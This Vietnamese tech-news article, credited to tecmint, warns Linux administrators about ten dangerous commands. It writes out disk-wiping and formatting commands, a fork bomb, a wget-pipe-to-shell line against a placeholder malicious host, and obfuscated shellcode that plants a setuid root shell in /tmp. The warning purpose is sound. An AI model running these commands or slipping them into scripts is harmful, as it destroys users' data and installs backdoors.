Danh sách 10 câu lệnh nguy hiểm nên cân nhắc trong Linux

danh-sach-10-cau-lenh-trong-linux-nen-can-nhac-su-dung-logoDanh sách 10 câu lệnh nên cân nhắc trong Linux được trang tecmint thống kê. Sau đây, chúng ta sẽ cùng VNITNEWS tìm hiểu xem đó là những câu lệnh gì nhé

Dòng lệnh của Linux là điều không thể thiếu trong việc quản trị hệ thống với mã nguồn mở . Đối với quản trị viên, việc nắm rõ các câu lệnh là một điều rất hữu ích và thú vị. Nhưng đôi khi có một số câu lệnh sẽ được coi là nguy hiểm nếu bạn chưa chắc chắn về câu lệnh đó. Việc cân nhắc , suy nghĩ trước khi sử dụng chúng là điều vô cùng cần thiết. Và sau đây là danh sách 10 câu lệnh đó :

danh-sach-10-cau-lenh-trong-linux-nen-can-nhac-su-dung-01

1 ) #rm -rf

Đây là câu lệnh thực thi việc xoá nhanh chóng 1 thư mục hay nội dung tài liệu nào đó. Hãy thận trọng trước khi sử dụng câu lệnh này vì khi đã sử dụng thì việc khôi phục là không thể.

DEMO : #rm -rf [Folder/File]

Ngoài ra :

#rm : Câu lệnh xoá file trong Linux

#rm -r : Câu lệnh file trong thư mục, làm cho thư mục trống

#rm -rf / : Xoá mọi thứ trong thư mục /

#rm -rf : Xoá folder và các sub-folder

2 ) :(){:|:&};:

Đây giống như là một quả bomd trong Linux, nó hoạt động bằng cách định nghĩa function gọi là ‘:‘ , lệnh này tiến hành tự thực thi nhân bản cho đến ghi hệ thống đóng băng

DEMO :

3 ) > dev/sda

Câu lệnh này cho phép ghi ra dev/sda . Ở đây sda là phân vùng ổ cứng. Việc sử dụng câu lệnh này có thể dẫn tới dữ liệu bị ghi đè gây mất dữ liệu

4 ) mv folder /dev/null

Là câu lệnh cho phép chuyển folder sang /dev/null . Trong Linux, null là một file có đặc điểm nhận dữ liệu như hố đen nhưng không trả lại gì cả

5 ) wget http://malicious_source -O- | sh

Đây là câu lệnh sẽ tải mã độc và thực thi nó, wget là câu lệnh download , còn sh là câu lệnh thực thi

6 ) mkfs.ext3 /dev/sda

Câu lệnh định dạng lại block sda của ổ cứng. Khi sử dụng câu lệnh này, cũng giống như việc format lại ổ cứng. Nếu không sử dụng đúng cách, sẽ gây mất toán bộ dữ liệu

7 ) > file

Lệnh trên được dùng để đẩy nội dung vào file. Việc sử dụng lệnh này sẽ gây thay đổi nội dung trong file. Sẽ là nguy hiểm nếu đó là file của hệ thống

8 ) ^foo^bar

Lệnh này dùng để thực thi lại câu lệnh đã thao tác trước đó nhưng không chính xác.

VD :

Câu lệnh không đúng :

avi@localhost:~/Desktop$ lls -l

bash: lls: command not found

Câu lệnh ^foo^bar

avi@localhost:~/Desktop$ ^lls^ls ls -l total 7489440 drwxr-xr-x 2 avi avi 36864 Nov 13 2012 101MSDCF -rw-r–r– 1 avi avi 206833 Nov 5 15:27 1.jpg -rw-r–r– 1 avi avi 158951 Nov 5 15:27 2.jpg -rw-r–r– 1 avi avi 90624 Nov 5 12:59 Untitled 1.doc

9 ) dd if=/dev/random of=/dev/sda

Lệnh trên sẽ quét sạch sda của hệ thống , và ghi data ngẫu nhiên lên ổ. Dĩ nhiên, thao tác này sẽ không thể khôi phục được

10 ) Hidden the Command

Câu lệnh ẩn này sẽ quét sạch phân vùng gốc. Vì vậy tốt nhất bạn đừng nên thực thi một mã nguồn nếu không rõ nội dung của nó

char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

Nguồn : tecmint.com

Ads

https://vnitnews.com

Leave a Reply

Email của bạn sẽ không được hiển thị công khai.